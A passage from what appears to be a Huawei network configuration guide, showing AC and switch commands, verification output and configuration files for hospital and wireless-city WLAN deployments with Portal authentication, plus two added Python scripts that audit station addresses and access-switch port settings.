[AC-wlan-view] quit

# Create WLAN-ESS interface 1 and WLAN-ESS interface 2.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102 //Configure the WLAN-ESS interface to allow packets from the wireless service VLANs to pass through, which is one of the prerequisites for intra-AC roaming.
[AC-Wlan-Ess1] quit
[AC] interface wlan-ess 2
[AC-Wlan-Ess2] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess2] quit

# Create the security profile security.
[AC] wlan
[AC-wlan-view] security-profile name security id 1 //Portal authentication has been enabled on the interface. Set the security policy to OPEN (default setting), that is, no authentication and no encryption.
[AC-wlan-sec-prof-security] quit

# Create the traffic profile traffic.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create service sets floor1 and floor2, and bind the service VLANs, WLAN-ESS interfaces,
security profile, and traffic profile to the service sets. Set the forwarding mode to tunnel
forwarding.
[AC-wlan-view] service-set name floor1 id 1 //Create the service set floor1.
[AC-wlan-service-set-floor1] ssid hospital-wlan //Set the SSID to hospital-wlan.
[AC-wlan-service-set-floor1] wlan-ess 1 //Bind the WLAN-ESS interface.
[AC-wlan-service-set-floor1] security-profile name security //Bind the security profile security.
[AC-wlan-service-set-floor1] traffic-profile name traffic //Bind the traffic profile traffic.
[AC-wlan-service-set-floor1] service-vlan 101 //Bind the service VLAN 101.
[AC-wlan-service-set-floor1] forward-mode tunnel //Set the forwarding mode to tunnel forwarding. The default forwarding mode is direct forwarding.
[AC-wlan-service-set-floor1] user-isolate //Configure Layer 2 isolation for users connected to the same VAP.
[AC-wlan-service-set-floor1] quit
[AC-wlan-view] service-set name floor2 id 2
[AC-wlan-service-set-floor2] ssid hospital-wlan //Set the SSID to hospital-wlan. All service sets must be configured with the same SSID, which is one of the prerequisites for intra-AC roaming.
[AC-wlan-service-set-floor2] wlan-ess 2
[AC-wlan-service-set-floor2] security-profile name security //Bind the security profile security. All service sets must have the same security profile bound, which is one of the prerequisites for intra-AC roaming.
[AC-wlan-service-set-floor2] traffic-profile name traffic
[AC-wlan-service-set-floor2] service-vlan 102
[AC-wlan-service-set-floor2] forward-mode tunnel
[AC-wlan-service-set-floor2] user-isolate
[AC-wlan-service-set-floor2] quit


Step 7 Configure VAPs and deliver VAP parameters to the APs.

# Configure VAPs.
[AC-wlan-view] ap 101 radio 0 //Configure radio 0 of the AP2010DN.
[AC-wlan-radio-101/0] radio-profile name radio //Bind the radio profile to the radio.
[AC-wlan-radio-101/0] service-set name floor1 //Bind the service set to the radio. A VAP is generated after the binding.
[AC-wlan-radio-101/0] channel 20mhz 1 //Configure the channel based on the planning result of the WLAN Planner.
[AC-wlan-radio-101/0] power-level 10 //Configure the power based on the planning result of the WLAN Planner.
[AC-wlan-radio-101/0] quit
[AC-wlan-view] ap 102 radio 0
[AC-wlan-radio-102/0] radio-profile name radio
[AC-wlan-radio-102/0] service-set name floor1
[AC-wlan-radio-102/0] channel 20mhz 6
[AC-wlan-radio-102/0] power-level 10
[AC-wlan-radio-102/0] quit
[AC-wlan-view] ap 103 radio 0
[AC-wlan-radio-103/0] radio-profile name radio
[AC-wlan-radio-103/0] service-set name floor1
[AC-wlan-radio-103/0] channel 20mhz 11
[AC-wlan-radio-103/0] power-level 10
[AC-wlan-radio-103/0] quit
[AC-wlan-view] ap 103 radio 1 //The AP5030 supports two radios. This step configures radio 1.
[AC-wlan-radio-103/1] radio-profile name radio
[AC-wlan-radio-103/1] service-set name floor1
[AC-wlan-radio-103/1] channel 20mhz 153
[AC-wlan-radio-103/1] power-level 10
[AC-wlan-radio-103/1] quit
[AC-wlan-view] ap 201 radio 0
[AC-wlan-radio-201/0] radio-profile name radio
[AC-wlan-radio-201/0] service-set name floor2
[AC-wlan-radio-201/0] channel 20mhz 1
[AC-wlan-radio-201/0] power-level 10
[AC-wlan-radio-201/0] quit
[AC-wlan-view] ap 202 radio 0
[AC-wlan-radio-202/0] radio-profile name radio
[AC-wlan-radio-202/0] service-set name floor2
[AC-wlan-radio-202/0] channel 20mhz 6
[AC-wlan-radio-202/0] power-level 10
[AC-wlan-radio-202/0] quit
[AC-wlan-view] ap 203 radio 0
[AC-wlan-radio-203/0] radio-profile name radio
[AC-wlan-radio-203/0] service-set name floor2
[AC-wlan-radio-203/0] channel 20mhz 11
[AC-wlan-radio-203/0] power-level 10
[AC-wlan-radio-203/0] quit
[AC-wlan-view] ap 203 radio 1
[AC-wlan-radio-203/1] radio-profile name radio
[AC-wlan-radio-203/1] service-set name floor2
[AC-wlan-radio-203/1] channel 20mhz 157
[AC-wlan-radio-203/1] power-level 10
[AC-wlan-radio-203/1] quit

# Deliver the configuration to the APs.


[AC-wlan-view] commit all //After the WLAN service configuration is complete on the AC, the configuration takes effect after you deliver it to the APs.
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.


# After the configuration is complete, run the display vap all command. The command output
shows that VAPs have been created.


[AC-wlan-view] display vap all
All VAP Information(Total-8):
SS: Service-set   BP: Bridge-profile   MP: Mesh-profile
----------------------------------------------------------------------
AP ID  Radio ID  SS ID  BP ID  MP ID  WLAN ID  BSSID           Type
----------------------------------------------------------------------
101    0         1      -      -      1        60de-4476-e320  service
102    0         1      -      -      1        60de-4476-e340  service
103    0         1      -      -      1        dcd2-fc04-b520  service
103    1         1      -      -      1        dcd2-fc04-b530  service
201    0         2      -      -      1        60de-4476-e360  service
202    0         2      -      -      1        60de-4476-e380  service
203    0         2      -      -      1        dcd2-fc04-b540  service
203    1         2      -      -      1        dcd2-fc04-b550  service
----------------------------------------------------------------------
Total: 8

# STAs discover the WLAN with the SSID hospital-wlan and associate with the WLAN. The
STAs are allocated IP addresses. After you enter the key, the STAs can access the wireless
network. Run the display station assoc-info command on the AC. The command output
shows that the STAs have connected to the WLAN hospital-wlan.
[AC-wlan-view] display station assoc-info all
AP/Rf/WLAN: AP ID/Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------
STA MAC         AP/Rf/WLAN  Rx/Tx  Mode  RSSI  IP address     SSID
------------------------------------------------------------------------------
e019-1dc7-1e08  101/0/1     6/11   11n   -89   10.23.101.254  hospital-wlan
------------------------------------------------------------------------------
Total stations: 1

# STAs and PCs obtain IP addresses and connect to the network normally.

----End
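The verification step above only confirms that a STA associated and obtained an address. A check a practitioner would add is whether each STA's address actually belongs to the service VLAN pool of the service set bound to the radio it sits on, since a STA that lands in the wrong VLAN escapes the user isolation configured per service set. The following is an added example, not code from Huawei or from this document: it parses the `display station assoc-info all` output format shown above and cross-checks every STA against the service-set to service-VLAN mapping from this example. The VAP mapping is taken from the `display vap all` output and the AC configuration file; the second STA in the sample output is constructed, with a deliberately mismatched address.

```python
"""Cross-check 'display station assoc-info all' output against the service
VLAN plan: each STA address must fall inside the address pool of the service
VLAN bound to the service set carried by its AP radio.
Added example, not Huawei's code. The mappings below are copied from this
page's 'display vap all' output and AC configuration; the second STA in the
sample output is constructed to show a mismatch."""
import ipaddress
import re
from typing import Dict, List, Tuple

# Service set id -> service VLAN pool (service-vlan 101 / 102 on the AC).
SERVICE_VLAN_POOL: Dict[int, str] = {1: "10.23.101.0/24", 2: "10.23.102.0/24"}
# (AP id, radio id) -> service set id, as listed by 'display vap all'.
VAP_SERVICE_SET: Dict[Tuple[int, int], int] = {
    (101, 0): 1, (102, 0): 1, (103, 0): 1, (103, 1): 1,
    (201, 0): 2, (202, 0): 2, (203, 0): 2, (203, 1): 2,
}

# Constructed sample: first row is the page's own output, second row is
# a made-up STA on AP201 that received an address from the floor1 pool.
SAMPLE_OUTPUT = """\
AP/Rf/WLAN: AP ID/Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
------------------------------------------------------------------------------
STA MAC         AP/Rf/WLAN  Rx/Tx  Mode  RSSI  IP address     SSID
------------------------------------------------------------------------------
e019-1dc7-1e08  101/0/1     6/11   11n   -89   10.23.101.254  hospital-wlan
0011-2233-4455  201/0/1     24/36  11n   -60   10.23.101.77   hospital-wlan
------------------------------------------------------------------------------
Total stations: 2
"""

# One STA row: MAC, AP/Rf/WLAN, Rx/Tx, Mode, RSSI, IP address, SSID.
STA_LINE = re.compile(
    r"^(?P<mac>[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4})\s+"
    r"(?P<ap>\d+)/(?P<rf>\d+)/(?P<wlan>\d+)\s+\S+\s+\S+\s+-?\d+\s+"
    r"(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<ssid>\S+)$")


def parse_stations(output: str) -> List[Dict[str, object]]:
    """Return one dict per STA row; header and separator lines are skipped."""
    rows: List[Dict[str, object]] = []
    for line in output.splitlines():
        m = STA_LINE.match(line.strip())
        if m:
            rows.append({"mac": m.group("mac"), "ap": int(m.group("ap")),
                         "rf": int(m.group("rf")), "ip": m.group("ip"),
                         "ssid": m.group("ssid")})
    return rows


def find_misplaced_stations(output: str) -> List[Tuple[str, str, str]]:
    """Return (MAC, IP, expected pool) for every STA whose address is not in
    the pool of the service VLAN its VAP is bound to."""
    misplaced: List[Tuple[str, str, str]] = []
    for sta in parse_stations(output):
        service_set = VAP_SERVICE_SET.get((sta["ap"], sta["rf"]))
        if service_set is None:
            misplaced.append((str(sta["mac"]), str(sta["ip"]), "unknown VAP"))
            continue
        pool = ipaddress.ip_network(SERVICE_VLAN_POOL[service_set])
        if ipaddress.ip_address(str(sta["ip"])) not in pool:
            misplaced.append((str(sta["mac"]), str(sta["ip"]), str(pool)))
    return misplaced


if __name__ == "__main__":
    for mac, ip, expected in find_misplaced_stations(SAMPLE_OUTPUT):
        print(f"{mac} has {ip}, expected an address in {expected}")
```

A STA reported outside its pool usually means a static address or a service VLAN bound to the wrong service set; either way it is worth raising before users are allowed onto the network.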

Configuration Files
l Configuration file of the S5700-1 connected to wired users
#
sysname S5700-1
#
vlan batch 100 201
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 201
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1


#
return
l Configuration file of the S5700-2 connected to wireless users
#
sysname S5700-2
#
vlan batch 100 202
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 202
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102 200 to 202 300
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
radius-server template radius1
radius-server shared-key cipher %#%#ut)92(w\&0@UJ}J7}^3Z9x`9~Y$`2D1AGwDQ[+S.%#%#
radius-server authentication 10.23.200.1 1812 source ip-address 10.23.200.2 weight 80
radius-server accounting 10.23.200.1 1813 source ip-address 10.23.200.2 weight 80
undo radius-server user-name domain-included
radius-server authorization 10.23.200.1 shared-key cipher %#%#[m1~SG]5CAzg~K35!b^Wa';{=+k_40Q\YK~}UX6T%#%#
#
web-auth-server portal1
server-ip 10.23.200.1
port 50200
shared-key cipher %#%#^B],0yW|oJ1;j:U&`%}(=@2t*]e.$TOVrx@(I6rT%#%#
url http://10.23.200.1:8080/portal
#
aaa
authentication-scheme radius1
authentication-mode radius
accounting-scheme radius1
accounting-mode radius
domain portal1
authentication-scheme radius1
accounting-scheme radius1
radius-server radius1
#


interface Vlanif100
description manage_ap
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
description manage_floor1_sta
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
description manage_floor2_sta
ip address 10.23.102.1 255.255.255.0
dhcp select interface
#
interface Vlanif200
ip address 10.23.200.2 255.255.255.0
#
interface Vlanif201
description manage_floor1_pc
ip address 10.23.201.1 255.255.255.0
dhcp select interface
#
interface Vlanif202
description manage_floor2_pc
ip address 10.23.202.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 201
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 202
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 300
#
interface Wlan-Ess1
port trunk allow-pass vlan 101 to 102
domain name portal1 force
domain name portal1
authentication portal
web-auth-server portal1 direct
#
interface Wlan-Ess2
port trunk allow-pass vlan 101 to 102
domain name portal1 force
domain name portal1
authentication portal
web-auth-server portal1 direct
#
capwap source interface vlanif100
#
wlan
ap-region id 1
ap-region-name floor1
ap-region id 2
ap-region-name floor2
ap id 101 type-id 38 mac 60de-4476-e320
region-id 1
lineate-port ethernet 0 pvid vlan 201
lineate-port ethernet 0 vlan untagged 201


lineate-port ethernet 1 pvid vlan 201


lineate-port ethernet 1 vlan untagged 201
lineate-port gigabitethernet 0 vlan tagged 201
ap id 102 type-id 38 mac 60de-4476-e340
region-id 1
lineate-port ethernet 0 pvid vlan 201
lineate-port ethernet 0 vlan untagged 201
lineate-port ethernet 1 pvid vlan 201
lineate-port ethernet 1 vlan untagged 201
lineate-port gigabitethernet 0 vlan tagged 201
ap id 103 type-id 35 mac dcd2-fc04-b520
region-id 1
ap id 201 type-id 38 mac 60de-4476-e360
region-id 2
lineate-port ethernet 0 pvid vlan 202
lineate-port ethernet 0 vlan untagged 202
lineate-port ethernet 1 pvid vlan 202
lineate-port ethernet 1 vlan untagged 202
lineate-port gigabitethernet 0 vlan tagged 202
ap id 202 type-id 38 mac 60de-4476-e380
region-id 2
lineate-port ethernet 0 pvid vlan 202
lineate-port ethernet 0 vlan untagged 202
lineate-port ethernet 1 pvid vlan 202
lineate-port ethernet 1 vlan untagged 202
lineate-port gigabitethernet 0 vlan tagged 202
ap id 203 type-id 35 mac dcd2-fc04-b540
region-id 2
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name floor1 id 1
forward-mode tunnel
wlan-ess 1
ssid hospital-wlan
user-isolate
traffic-profile id 1
security-profile id 1
service-vlan 101
service-set name floor2 id 2
forward-mode tunnel
wlan-ess 2
ssid hospital-wlan
user-isolate
traffic-profile id 1
security-profile id 1
service-vlan 102
radio-profile name radio id 1
channel-mode fixed
power-mode fixed
wmm-profile id 1
ap 101 radio 0
radio-profile id 1
power-level 10
service-set id 1 wlan 1
ap 102 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
service-set id 1 wlan 1
ap 103 radio 0
radio-profile id 1
channel 20MHz 11
power-level 10
service-set id 1 wlan 1
ap 103 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10


service-set id 1 wlan 1
ap 201 radio 0
radio-profile id 1
power-level 10
service-set id 2 wlan 1
ap 202 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
service-set id 2 wlan 1
ap 203 radio 0
radio-profile id 1
channel 20MHz 11
power-level 10
service-set id 2 wlan 1
ap 203 radio 1
radio-profile id 1
channel 20MHz 157
power-level 10
service-set id 2 wlan 1
#
return

15.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)

WLAN Service Overview


You can configure WLAN services to allow wireless users to easily access a wireless network
and move around within the coverage area of the wireless network.

Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an
appropriate security policy according to service requirements.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to APs. If port isolation is not configured, a large number of broadcast packets will be transmitted in the VLANs, and WLAN users on different APs can communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.


– In V200R007 and V200R008, run the capwap source interface { loopback loopback-number | vlanif vlan-id } command in the system view.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-9 Applicable products and versions

| Software Version | Product Model | AP Model and Version |
|---|---|---|
| V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN |
| V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN |
| V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN |
| V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN |
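The Configuration Notes above state two requirements for direct forwarding that are easy to miss when access switches are configured by hand: the interfaces that directly connect to APs must have port isolation enabled, and those interfaces must carry both the management VLAN and the service VLAN. The following is an added example, not code from Huawei or from this document, that audits a configuration file in the format shown in the Configuration Files sections of this chapter. It assumes, as this chapter's data plan does, that an AP-facing port is recognisable by its PVID being the management VLAN; the sample configuration is constructed to resemble the S5700-1 file, with one port lacking isolation and one port missing the service VLAN.

```python
"""Audit a VRP-style configuration file for the access-switch requirements
in the Configuration Notes: every AP-facing interface (PVID = management
VLAN, an assumption taken from this chapter's data plan) must carry the
management and service VLANs and must have port isolation enabled.
Added example, not Huawei's code."""
import re
from typing import Dict, List, Set

# Constructed sample modelled on the S5700-1 file on this page:
# GE0/0/3 lacks port isolation, GE0/0/4 does not carry service VLAN 101.
SAMPLE_CONFIG = """\
#
 sysname S5700-1
#
vlan batch 10 101
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk allow-pass vlan 10 101
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 10
 port trunk allow-pass vlan 10 101
 port-isolate enable group 1
#
interface GigabitEthernet0/0/3
 port link-type trunk
 port trunk pvid vlan 10
 port trunk allow-pass vlan 10 101
#
interface GigabitEthernet0/0/4
 port link-type trunk
 port trunk pvid vlan 10
 port trunk allow-pass vlan 10
 port-isolate enable group 1
#
return
"""


def parse_interfaces(config: str) -> Dict[str, List[str]]:
    """Map each 'interface <name>' block to the commands under it.
    A block ends at the '#' separator or at 'return'."""
    interfaces: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif line in ("#", "return"):
            current = None
        elif current is not None and line:
            interfaces[current].append(line)
    return interfaces


def expand_vlans(spec: str) -> Set[int]:
    """Expand a VRP VLAN list such as '100 to 102 200 to 202 300'."""
    if spec.strip() == "all":
        return set(range(1, 4095))
    tokens = spec.split()
    vlans: Set[int] = set()
    i = 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def audit_ap_ports(config: str, mgmt_vlan: int,
                   service_vlans: Set[int]) -> Dict[str, List[str]]:
    """Return {interface: [findings]} for every AP-facing interface.
    An empty findings list means the port meets both requirements."""
    results: Dict[str, List[str]] = {}
    for name, cmds in parse_interfaces(config).items():
        pvid, allowed, isolated = None, set(), False
        for cmd in cmds:
            m = re.match(r"port trunk pvid vlan (\d+)$", cmd)
            if m:
                pvid = int(m.group(1))
            m = re.match(r"port trunk allow-pass vlan (.+)$", cmd)
            if m:
                allowed |= expand_vlans(m.group(1))
            if cmd.startswith("port-isolate enable"):
                isolated = True
        if pvid != mgmt_vlan:
            continue  # uplink or unrelated port, not AP-facing in this design
        findings: List[str] = []
        if not isolated:
            findings.append("port isolation missing")
        missing = (service_vlans | {mgmt_vlan}) - allowed
        if missing:
            findings.append("trunk does not allow VLAN(s) "
                            + ", ".join(str(v) for v in sorted(missing)))
        results[name] = findings
    return results


if __name__ == "__main__":
    for port, issues in audit_ap_ports(SAMPLE_CONFIG, 10, {101}).items():
        print(port, "OK" if not issues else "; ".join(issues))
```

Run it against `display current-configuration` output saved from each access switch; a port that is skipped entirely is one without a PVID, which in this design means an uplink rather than an AP port.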

Networking Requirements
A city needs to deploy the wireless smart city project and requires that Portal authentication
be used for wireless users in the coverage area of the wireless network. Since a large number
of wireless users exist, high wireless service performance and Portal authentication
performance are required.
As shown in Figure 15-4, the S9700 core switch functions as the gateway for STAs and APs
and as the DHCP server to assign IP addresses to STAs and APs. The S9700 connects to APs
through PoE access switches S5700-1 and S5700-2. The AC and APs are located on a Layer 3
network. The AC is an X series card in the S9700 and is connected to the S9700 through an Eth-Trunk in bypass mode.
To facilitate network planning and management, the access switches only transparently transmit data at Layer 2.


Figure 15-4 Networking diagram for configuring WLAN services for a wireless city project

[Figure: Internet - Router - S9700, with the Controller attached to S9700 GE1/0/3 and the upper-layer network to GE1/0/4; the AC is connected to the S9700 through an Eth-Trunk (AC GE2/0/1 and GE2/0/2 to S9700 GE1/0/5 and GE1/0/6); S9700 GE1/0/1 connects to S5700-1 GE0/0/1 and S9700 GE1/0/2 to S5700-2 GE0/0/1; S5700-1 GE0/0/2 and GE0/0/3 connect to AP101 and AP102, S5700-2 GE0/0/2 and GE0/0/3 connect to AP201 and AP202.]

Data Planning

Table 15-10 Network data planning

| Item | Interface | VLAN | Description |
|---|---|---|---|
| AC | Eth-Trunk1 | 100 | Configured to improve network bandwidth and reliability. Add GE2/0/1 and GE2/0/2 to Eth-Trunk 1 and connect the two interfaces to the S9700. |
| S5700-1 | GE0/0/1 | 10, 101 | Connected to the AC |
| S5700-1 | GE0/0/2 | 10, 101 | Connected to AP101 |
| S5700-1 | GE0/0/3 | 10, 101 | Connected to AP102 |
| S5700-2 | GE0/0/1 | 20, 102 | Connected to the AC |
| S5700-2 | GE0/0/2 | 20, 102 | Connected to AP201 |
| S5700-2 | GE0/0/3 | 20, 102 | Connected to AP202 |
| S9700 | GE1/0/1 | 10, 101 | Connected to the S5700-1 |
| S9700 | GE1/0/2 | 20, 102 | Connected to the S5700-2 |
| S9700 | GE1/0/3 | 300 | Connected to the Controller |
| S9700 | GE1/0/4 | 101, 102 | Connected to the upper-layer network |
| S9700 | Eth-Trunk1 | 100 | Configured to improve network bandwidth and reliability. Add GE1/0/5 and GE1/0/6 to Eth-Trunk 1 and connect the two interfaces to the AC. |

Table 15-11 Service data planning

| Item | Data | Description |
|---|---|---|
| IP address of the AC's source interface | 10.23.100.1/24 | - |
| Country code | CN | - |
| WMM profile | Name: wmm | - |
| Radio profile | Name: radio | - |
| Security profile | Name: security; Security and authentication policy: OPEN | - |
| Traffic profile | Name: traffic | - |
| Service set | Name: area_1; SSID: city-wlan; WLAN virtual interface: WLAN-ESS1; Service data forwarding mode: direct forwarding | Provides WLAN network coverage for Area1. |
| Service set | Name: area_2; SSID: city-wlan; WLAN virtual interface: WLAN-ESS2; Service data forwarding mode: direct forwarding | Provides WLAN network coverage for Area2. |
| DHCP server | The S9700 functions as the DHCP server to assign IP addresses to APs and STAs. | - |
| AP gateway and IP address pool range | VLANIF10: 10.23.10.1/24, 10.23.10.2-10.23.10.254/24 | Gateway and IP address pool for AP101 and AP102 |
| AP gateway and IP address pool range | VLANIF20: 10.23.20.1/24, 10.23.20.2-10.23.20.254/24 | Gateway and IP address pool for AP201 and AP202 |
| STA gateway and IP address pool range | VLANIF101: 10.23.101.1/24, 10.23.101.2-10.23.101.254/24 | - |
| STA gateway and IP address pool range | VLANIF102: 10.23.102.1/24, 10.23.102.2-10.23.102.254/24 | - |
| Server parameters | Authentication server: Active IP address: 10.23.30.1; Active IP address: 10.23.30.2; Standby IP address: 10.23.30.3; Port number: 1812; RADIUS shared key: Admin@123 | Three Service Controllers (SCs) are deployed on the network. Controller1 and Controller2 are used for load balancing, and Controller3 serves as a backup for Controller1 and Controller2. The Service Controller (SC) of the Agile Controller provides RADIUS server and Portal server functions; therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are all the IP address of the SC. |
| Server parameters | Accounting server: Active IP address: 10.23.30.1; Active IP address: 10.23.30.2; Standby IP address: 10.23.30.3; Port number: 1813; RADIUS shared key: Admin@123 | Configure a RADIUS accounting server to collect user login and logout information. The port numbers of the authentication server and accounting server must be the same as those of the RADIUS server. |
| Server parameters | Authorization server: Active IP address: 10.23.30.1; Active IP address: 10.23.30.2; Standby IP address: 10.23.30.3; RADIUS shared key: Admin@123 | Configure an authorization server to enable the RADIUS server to deliver authorization rules to the AC. The shared key of the authorization server must be the same as those of the authentication server and accounting server. |
| Server parameters | Portal server: Active IP address: 10.23.30.1; Active IP address: 10.23.30.2; Standby IP address: 10.23.30.3; Port number that the AC uses to listen on Portal protocol packets: 2000; Destination port number in the packets that the AC sends to the Portal server: 50100; Portal shared key: Admin@123; Encryption key for the URL parameters that the AC sends to the Portal server: Admin@123 | - |

Table 15-12 Radio channel data planning

| Item | Data | Description |
|---|---|---|
| AP101 | Radio 0: channel 1 and power level 10; Radio 1: channel 153 and power level 10 | Use the WLAN Planner to plan AP installation locations, and the working channel and power of the AP radio. Set the channel mode and power mode to fixed, and configure the channel and power for each AP. |
| AP102 | Radio 0: channel 6 and power level 10; Radio 1: channel 161 and power level 10 | |
| AP201 | Radio 0: channel 1 and power level 10; Radio 1: channel 153 and power level 10 | |
| AP202 | Radio 0: channel 6 and power level 10; Radio 1: channel 161 and power level 10 | |

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure all network devices to enable the APs, S5700-1, S5700-2, S9700, and AC to
communicate with upper-layer devices.
2. Configure the AC as a DHCP server to assign IP addresses to the STAs and APs.
3. Configure a RADIUS server template with authentication, accounting, and authorization servers, and configure Portal authentication.
4. Configure basic WLAN services, including AC system parameters, AP management, and
WLAN service parameters.
5. Configure VAPs and deliver VAP parameters to APs.
6. Verify the configuration to ensure that both wired and wireless users can access the
Internet.

Procedure
Step 1 Configure network devices to communicate with each other.
# Add interfaces GE0/0/1 to GE0/0/3 of the S5700-1 to VLAN 10 (management VLAN) and VLAN 101 (service VLAN). Set PVIDs on the interfaces directly connected to APs; configuring port isolation on these interfaces is also advised to reduce broadcast packets.
[HUAWEI] sysname S5700-1
[S5700-1] vlan batch 10 101
[S5700-1] interface gigabitethernet 0/0/1
[S5700-1-GigabitEthernet0/0/1] port link-type trunk
[S5700-1-GigabitEthernet0/0/1] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/1] quit
[S5700-1] interface gigabitethernet 0/0/2
[S5700-1-GigabitEthernet0/0/2] port link-type trunk
[S5700-1-GigabitEthernet0/0/2] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 10 //Set a PVID for the interface directly connected to the AP.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/2] quit
[S5700-1] interface gigabitethernet 0/0/3
[S5700-1-GigabitEthernet0/0/3] port link-type trunk
[S5700-1-GigabitEthernet0/0/3] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/3] port trunk pvid vlan 10
[S5700-1-GigabitEthernet0/0/3] port-isolate enable
[S5700-1-GigabitEthernet0/0/3] quit


